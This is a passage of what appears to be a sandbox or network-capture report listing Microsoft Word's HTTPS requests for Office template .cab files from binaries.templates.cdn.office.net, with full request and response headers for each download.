      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
      Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
      ETag: 0x8D36AC8822FFB6E
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: d1eac4bf-d01e-0092-5897-a00efc000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851220.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31482
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
      Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
      ETag: 0x8D36AC8827914A7
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 6af291c5-801e-0036-306e-a9075a000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0403392901.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1766185
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: go+WAx9Av468teUqrut+TA==
      Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
      ETag: 0x8D60DDC4354B7FB
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: a3240f77-901e-0000-474a-3a8045000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851222.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 28911
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: bXh7HiI9trkbaSOAYsyocg==
      Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
      ETag: 0x8D36AC8830E54C8
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 2bee5db1-501e-00ee-2682-b92003000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0345746401.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 276650
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
      Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
      ETag: 0x8D60DDB824A3C69
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: e38519df-901e-010c-7f9a-a090cd000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851223.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 32833
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
      Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
      ETag: 0x8D36AC88357BC32
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 1e858e71-b01e-0028-5118-2de1ed000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851221.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31562
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
      Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
      ETag: 0x8D36AC882C4ED43
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: e4f000bb-501e-0148-0297-a06910000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851224.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 30957
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 08kDbk4RWegysbTS6dQr8A==
      Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
      ETag: 0x8D36AC883A171B7
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7a3535a8-301e-0103-55f4-b69543000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851225.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31008
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
      Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
      ETag: 0x8D36AC883F49D7D
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: b3f59ba9-f01e-00aa-4597-a0aa3c000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0309043402.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 723359
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
      Last-Modified: Wed, 29 Aug 2018 18:14:30 GMT
      ETag: 0x8D60DDB43B59EC5
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: b73fb8ce-601e-005c-4e97-a0df72000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp02851226.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 35519
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
      Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
      ETag: 0x8D36AC88440C433
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 19a4e9a0-101e-0104-7797-a0f920000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03998159.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 3417042
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
      Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
      ETag: 0x8D36AC8BD7E1FE9
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: c28a3f34-b01e-00c9-0497-a037c7000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328893.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 20235
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
      Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
      ETag: 0x8D36AC898C9059A
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7e7953a4-301e-000c-4e28-bf1d22000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328905.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 20457
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
      Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
      ETag: 0x8D36AC886167DDF
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 3e37f31b-801e-0044-5062-b90015000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328908.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31083
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: iamBjmZY1zpztkJSL/hwHw==
      Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
      ETag: 0x8D36AC8865F4922
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7551dfc1-501e-00b3-0597-a02a87000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328916.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 26944
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
      Last-Modified: Fri, 22 Apr 2016 16:09:47 GMT
      ETag: 0x8D36AC886C4C4EE
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 1184cf03-901e-010a-18fd-bfd090000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0345744402.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 295527
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
      Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
      ETag: 0x8D60DFAA9CC48C3
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: ea01ec0c-b01e-0110-4a97-a048da000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328919.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 22149
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
      Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
      ETag: 0x8D36AC8871139C3
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: bd32d8ea-801e-0033-2376-14dfee000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:42 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328998.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 21357
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: l/W3t+nhKBmZRopcQssS5w==
      Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
      ETag: 0x8D36AC88A7F05EE
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: d5cd4d7a-901e-011a-2b97-a015f8000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0345748501.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 2591108
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: vrEqBGTQlsozuupDUs6ADw==
      Last-Modified: Wed, 29 Aug 2018 18:18:43 GMT
      ETag: 0x8D60DDBDA502B66
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 4182b976-401e-0119-4e97-a0f49c000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328932.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 20554
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
      Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
      ETag: 0x8D36AC887A4CC19
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 2cfa2269-c01e-0045-22f2-a05fc9000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328925.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 25314
      Content-Type: application/vnd.ms-cab-compressed
